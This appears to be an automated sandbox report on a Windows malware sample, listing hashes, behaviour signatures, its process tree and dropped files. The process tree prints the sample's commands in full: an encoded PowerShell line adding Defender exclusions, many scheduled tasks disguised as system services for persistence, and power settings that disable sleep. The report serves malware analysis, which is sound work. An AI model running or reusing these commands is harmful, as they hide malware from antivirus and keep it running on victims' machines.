Resubmissions

16/01/2023, 01:24

230116-bsfqfsfc36 1

15/01/2023, 22:18

230115-179phsha5v 8

Analysis

  • max time kernel
    313s
  • max time network
    327s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    15/01/2023, 22:18

General

  • Target

    ab0a87253e5fcbb63c5ba8273db9ea24bc55ddd3ea9ab2553dcca24c8e5c6ec0.exe

  • Size

    471KB

  • MD5

    df1067c92474065997c609774759e1d9

  • SHA1

    ae8eedf832a90abce59ae467f1df2ebc15cc01fb

  • SHA256

    ab0a87253e5fcbb63c5ba8273db9ea24bc55ddd3ea9ab2553dcca24c8e5c6ec0

  • SHA512

    00d3180ae7ccbf8f9e2924d1b4d9c8c6daa21c48cc3557f784a23e32c79f0d4c3ca4d67f89043734314f39e51d6d70db670503f68f734c8ca373ce960a853ebf

  • SSDEEP

    12288:tQPoQJYSDAcvmMjwAUgExSFd/nNorKKebEmcQQmfyctpOCc/QK8:oYSDjwvgE6BnNqKK

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Creates scheduled task(s) 1 TTPs 15 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ab0a87253e5fcbb63c5ba8273db9ea24bc55ddd3ea9ab2553dcca24c8e5c6ec0.exe
    "C:\Users\Admin\AppData\Local\Temp\ab0a87253e5fcbb63c5ba8273db9ea24bc55ddd3ea9ab2553dcca24c8e5c6ec0.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1996
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C powershell -EncodedCommand "PAAjAFIAUgBJAG4AVQBsAEEAbgBDAFAAdgBuAHIAUQBOACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMASQB1AHMAYwBUAG4AbQB3AEoAWABIACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBqAFoAcgB3AG0ARABPAHMAUABTAEQAagBzAHMAIwA+ACAAQAAoACAAPAAjAHAATgBlAHMAbABrAHAAbAB0AGEAeABsAFgARgBiAGcAVQBHACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBqAFkAbwBTAG4AQwBPAEQASABOAE4AegBIAFIAagB5AEIAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAHIAawBrAEYAQwBEAHEAaABqAG8ASgBvAFMAWgBQAEYAcgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBFAGQAdwBuAGkAbQBnAHkAdgBiAEoAIwA+AA=="
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1568
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -EncodedCommand "PAAjAFIAUgBJAG4AVQBsAEEAbgBDAFAAdgBuAHIAUQBOACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMASQB1AHMAYwBUAG4AbQB3AEoAWABIACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBqAFoAcgB3AG0ARABPAHMAUABTAEQAagBzAHMAIwA+ACAAQAAoACAAPAAjAHAATgBlAHMAbABrAHAAbAB0AGEAeABsAFgARgBiAGcAVQBHACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBqAFkAbwBTAG4AQwBPAEQASABOAE4AegBIAFIAagB5AEIAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAHIAawBrAEYAQwBEAHEAaABqAG8ASgBvAFMAWgBQAEYAcgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBFAGQAdwBuAGkAbQBnAHkAdgBiAEoAIwA+AA=="
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1632
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1280
      • C:\Windows\SysWOW64\schtasks.exe
        SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        3⤵
        • Creates scheduled task(s)
        PID:2004
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1656
      • C:\Windows\SysWOW64\schtasks.exe
        SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        3⤵
        • Creates scheduled task(s)
        PID:868
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:668
      • C:\Windows\SysWOW64\schtasks.exe
        SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        3⤵
        • Creates scheduled task(s)
        PID:1680
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:892
      • C:\Windows\SysWOW64\schtasks.exe
        SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        3⤵
        • Creates scheduled task(s)
        PID:932
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1800
      • C:\Windows\SysWOW64\schtasks.exe
        SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        3⤵
        • Creates scheduled task(s)
        PID:692
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:848
      • C:\Windows\SysWOW64\schtasks.exe
        SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        3⤵
        • Creates scheduled task(s)
        PID:1884
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1052
      • C:\Windows\SysWOW64\schtasks.exe
        SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        3⤵
        • Creates scheduled task(s)
        PID:1688
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      2⤵
        PID:2008
        • C:\Windows\SysWOW64\schtasks.exe
          SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
          3⤵
          • Creates scheduled task(s)
          PID:304
      • C:\Windows\SysWOW64\cmd.exe
        "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk793" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
        2⤵
          PID:572
          • C:\Windows\SysWOW64\schtasks.exe
            SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk793" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
            3⤵
            • Creates scheduled task(s)
            PID:844
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk775" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
          2⤵
            PID:1576
            • C:\Windows\SysWOW64\schtasks.exe
              SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk775" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
              3⤵
              • Creates scheduled task(s)
              PID:1332
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk306" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
            2⤵
              PID:1376
              • C:\Windows\SysWOW64\schtasks.exe
                SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk306" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                3⤵
                • Creates scheduled task(s)
                PID:1144
            • C:\Windows\SysWOW64\cmd.exe
              "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk562" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
              2⤵
                PID:1760
                • C:\Windows\SysWOW64\schtasks.exe
                  SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk562" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                  3⤵
                  • Creates scheduled task(s)
                  PID:780
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk84" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                2⤵
                  PID:1348
                  • C:\Windows\SysWOW64\schtasks.exe
                    SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk84" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                    3⤵
                    • Creates scheduled task(s)
                    PID:288
                • C:\Windows\SysWOW64\cmd.exe
                  "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                  2⤵
                    PID:1964
                    • C:\Windows\SysWOW64\powercfg.exe
                      powercfg /x -hibernate-timeout-ac 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2064
                    • C:\Windows\SysWOW64\powercfg.exe
                      powercfg /x -hibernate-timeout-dc 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2152
                    • C:\Windows\SysWOW64\powercfg.exe
                      powercfg /x -standby-timeout-ac 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2172
                    • C:\Windows\SysWOW64\powercfg.exe
                      powercfg /x -standby-timeout-dc 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2188
                    • C:\Windows\SysWOW64\powercfg.exe
                      powercfg /hibernate off
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2204
                    • C:\Windows\SysWOW64\schtasks.exe
                      SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                      3⤵
                      • Creates scheduled task(s)
                      PID:2220
                  • C:\Windows\SysWOW64\cmd.exe
                    "cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
                    2⤵
                      PID:1712
                      • C:\Windows\SysWOW64\schtasks.exe
                        SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
                        3⤵
                        • Creates scheduled task(s)
                        PID:2076
                  • C:\Windows\system32\taskeng.exe
                    taskeng.exe {EDED263B-BCA9-49A9-9D0A-51797BF8F997} S-1-5-21-3406023954-474543476-3319432036-1000:VUIIVLGQ\Admin:Interactive:[1]
                    1⤵
                      PID:2400
                      • C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                        C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe
                        2⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2440
                      • C:\ProgramData\RuntimeBrokerData\RegSvc.exe
                        C:\ProgramData\RuntimeBrokerData\RegSvc.exe
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2456

                    Network

                    MITRE ATT&CK Enterprise v6

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\ProgramData\MicrosoftSystemCache\mib.bin

                      Filesize

                      915B

                      MD5

                      5f40458607e9d01b6a9ee35800912d7c

                      SHA1

                      a91cd870a5b65570374f1a09e4b67dfca8b0292e

                      SHA256

                      cb97d6a1e3812ed94c390c064d7127a2f24b25a8f9c218b20e84f73a178d94e8

                      SHA512

                      9310aeb8a94bc0cbc0af1880b796b4861bc520b85a1af43715057c14607b647b650d56db59e6b8dfcbbdd25e5e64fadf9996f99f45abb6fc9ecce3943f1088ff

                    • C:\ProgramData\RuntimeBrokerData\RegSvc.exe

                      Filesize

                      71KB

                      MD5

                      1b015541bc36c1b1bf8adbef10300f9f

                      SHA1

                      9408d80ee620195e14c5e1ed1e4029ad33b59ab9

                      SHA256

                      2d439ba56668cdab2b21a015b8f8ebcbf9e5b9e48ed25a2a77d28c0660b70d19

                      SHA512

                      05e827e2aecef182d79310e9f2513dabff573262ecd9f015a097f8e07e889a49e74849ef87303c3813c07f0b1c44db958da2e2470a8b95d75639def15a36459e

                    • C:\ProgramData\RuntimeBrokerData\RegSvc.exe

                      Filesize

                      71KB

                      MD5

                      1b015541bc36c1b1bf8adbef10300f9f

                      SHA1

                      9408d80ee620195e14c5e1ed1e4029ad33b59ab9

                      SHA256

                      2d439ba56668cdab2b21a015b8f8ebcbf9e5b9e48ed25a2a77d28c0660b70d19

                      SHA512

                      05e827e2aecef182d79310e9f2513dabff573262ecd9f015a097f8e07e889a49e74849ef87303c3813c07f0b1c44db958da2e2470a8b95d75639def15a36459e

                    • C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe

                      Filesize

                      151KB

                      MD5

                      3f9c61f8ff5dc5d34142b1cb0d7aaaed

                      SHA1

                      07d22fd573132d9a1dbd64d90bfac05a182671a3

                      SHA256

                      d98b2fbb362b7cd119e02b82478e19c7c37a44767fd968609b7b23a75730b8be

                      SHA512

                      ba8092667cd8fefb64b66659a7d828d00aa371063b06444eee3b0ff88b0a376f2d8d08d626a8b6bc1a702f9833548ec342c887ca582018a5aa9616a5adbf6859

                    • C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe

                      Filesize

                      151KB

                      MD5

                      3f9c61f8ff5dc5d34142b1cb0d7aaaed

                      SHA1

                      07d22fd573132d9a1dbd64d90bfac05a182671a3

                      SHA256

                      d98b2fbb362b7cd119e02b82478e19c7c37a44767fd968609b7b23a75730b8be

                      SHA512

                      ba8092667cd8fefb64b66659a7d828d00aa371063b06444eee3b0ff88b0a376f2d8d08d626a8b6bc1a702f9833548ec342c887ca582018a5aa9616a5adbf6859

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                      Filesize

                      61KB

                      MD5

                      fc4666cbca561e864e7fdf883a9e6661

                      SHA1

                      2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5

                      SHA256

                      10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b

                      SHA512

                      c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                      Filesize

                      342B

                      MD5

                      8ba250259e16c79df557eff6ea07c9d3

                      SHA1

                      4c4e58a6b0d12e8ffa6387760cc2587fccbd003b

                      SHA256

                      ce6983ff911e7139f804fa607d4c9c3cb65afc6b706733ec3bd40601b8ec6d1c

                      SHA512

                      4c11ae70e0368675fe53f2412e5058e51627f5c7e7feb2c21c3bc916a749cd830456b62cbf4e8394e847c1fa8ae0343053da09d5f8055d608c62b32ef9ffef54

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                      Filesize

                      342B

                      MD5

                      c584a0ce38f3f385b11bd8871622814c

                      SHA1

                      02fce28a623c547a01f8ce935f873cb8168d7134

                      SHA256

                      a75b048a41b8d54e8ef17f08e46afe1c7ae9f66f39e29668e81d131cb648c135

                      SHA512

                      f934a3577acbe9bfa1ac51f7ed7ef9bc85cbb281ff1c03a77dc09b76a9527a3d8a373035f0b436cfbc2c01da1c1b12fc95e24f6e7dad5c5f5bae84eefd72b107

                    • memory/1632-60-0x000000006F510000-0x000000006FABB000-memory.dmp

                      Filesize

                      5.7MB

                    • memory/1632-59-0x000000006F510000-0x000000006FABB000-memory.dmp

                      Filesize

                      5.7MB

                    • memory/1996-54-0x0000000001000000-0x000000000107C000-memory.dmp

                      Filesize

                      496KB

                    • memory/1996-55-0x0000000075631000-0x0000000075633000-memory.dmp

                      Filesize

                      8KB

                    • memory/2440-108-0x0000000000BD0000-0x0000000000BFC000-memory.dmp

                      Filesize

                      176KB

                    • memory/2440-115-0x0000000006F15000-0x0000000006F26000-memory.dmp

                      Filesize

                      68KB

                    • memory/2456-107-0x0000000000CA0000-0x0000000000CB8000-memory.dmp

                      Filesize

                      96KB